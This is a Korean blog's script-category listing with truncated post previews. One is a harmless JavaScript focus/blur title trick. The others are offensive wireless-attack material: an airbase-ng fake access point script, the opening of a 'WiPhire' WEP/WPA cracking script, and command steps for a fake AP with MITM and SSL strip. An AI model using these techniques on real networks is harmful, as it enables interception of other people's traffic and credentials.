본문 바로가기

IT/Script

[JS]focus, blur를 이용한 동적 타이틀 만들기 #자바스크립트 #focus #blur 자바스크립트를 이용해서 동적 타이틀 만들기 홈페이지 타이틀 두개쓰기(?) 웹서핑중 신박한걸 발견해서 바로 블로그에 적용하였음 #간단하게 움짤로 동작하는 모습 확인 자바스크립트 코드 확인 var pageTitle = $("title").text(); console.log(pageTitle) $(window).focus(function() { document.title = pageTitle; }); $(window).blur(function() { document.title = 'We miss you ♥'; }); #블로그에 적용하기 JS파일 다운로드 스킨편집 메뉴에서 다운받은 js파일업로드 HTML편집 메뉴에서 업로드한 js파일추가 더보기
airbase-ng 스크립트 [ Fake AP + Encryption ] ### Fake Access Point ### with encryption### WEP / WPA / OPN ### ### arguments ##### $1 = MAC ADDRESS## $2 = ESSID## $3 = channel## $4 = monitoring interface [mon0, mon1.....]## $5 = Encryption type [ WEP, WPA, WPA2 ]## $6 = password #!/bin/bash WEP='-w'password=$6WPA='-w '$password' -z 2'WPA2='-w '$password' -Z 4'if [ $5 == WEP ]; thenairbase-ng -a $1 -e $2 -c $3 $4 $WEP $6elif [ $5 == WPA ]; t.. 더보기
무선 네트워크 해킹 툴 [ WiPhire Script ] # 무선 네트워크 해킹 툴# 스크립트 다운로드 # Zenity 작업 중 (30%) #!/bin/bash ###########Variables##########_zenity="/usr/bin/zenity"_out="/tmp/monitoring.output.$$"wpainterface=0WPAMAC="00:11:22:33:44:55"WEPMAC="00:11:22:33:44:55"WEPinterface='mon0'wpainterface='mon0' ##########Functions########## #####WEP Crack#####function CrackWEP {clear$"CrackWEPsetup"} function CrackWEPsetup {$'Monitoring' 2>/dev/nullecho -e .. 더보기
FAKE AP 생성과 MITM / SSL strip 공격 FAKE AP 생성과 MITM / SSL strip 공격 최초 무선 랜카드 연결 및 연결 확인#> iwconfig or ifconfig 공격자 GateWay 확인(192.168.0.1)#> route -n DHCP server 설치#> apt-get install isc-dhcp-server DHCP 설정 파일 생성#> vi /etc/dhcpd.conf 아래 내용 추가 airmon 활성화 (wlan interface 확인)#> airmon-ng start wlan0 fake ap 실행 (mon interface 확인)#> airbase-ng -c 채널 -e freewifi mon0 만들어진 fake ap 설정 (at interface 확인)#> ifconfig at0 192.168.1.1 netmask .. 더보기